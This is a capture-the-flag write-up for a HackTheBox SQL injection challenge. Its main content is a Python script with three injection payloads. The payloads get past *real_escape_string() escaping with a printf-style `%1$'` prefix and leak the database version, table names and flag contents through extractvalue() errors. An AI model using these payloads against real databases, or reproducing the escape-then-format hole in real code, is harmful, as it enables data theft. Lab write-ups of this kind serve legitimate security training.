https://app.hackthebox.com/challenges/146

Description

I heard that *real_escape_string() functions protect you from malicious user input inside SQL statements, I hope you can’t prove me wrong…

Exploitation

#!/usr/bin/env python3
import re
import requests
import sys

# MySQL echoes the malformed XPath expression back in its error text,
# which is the channel extractvalue() uses to leak whatever we concat() into it.
LEAK_RE = re.compile(r"XPATH syntax error: '(~[^']*)'")

def send_post_request(url, data):
    return requests.post(url, data=data)

if len(sys.argv) != 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)
host, port = sys.argv[1].split(':')
HOST = f'http://{host}:{port}/'
# `%1$'` is a printf-style format prefix (positional argument plus padding
# flag); it is what gets the quote past the *real_escape_string() call the
# description brags about.  The rest closes the string and parenthesis, ORs in
# an error-based extractvalue() leak (0x7e is '~', a marker that makes the
# leaked value easy to spot) and comments out the remainder of the statement.
payloads = [
    {'pass': "%1$')||extractvalue(null,concat(0x7e, version()));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#"}
]
for payload in payloads:
    body = send_post_request(HOST, payload).text
    leak = LEAK_RE.search(body)
    # Print just the leaked value when the error fired, otherwise the whole
    # response so a failed injection is visible.
    print(leak.group(1) if leak else body)

Summary

baby sql: the *real_escape_string() escaping is defeated with a printf-style `%1$'` prefix; the resulting SQL injection leaks the database version, the table names and finally the contents of totally_not_a_flag through extractvalue() errors.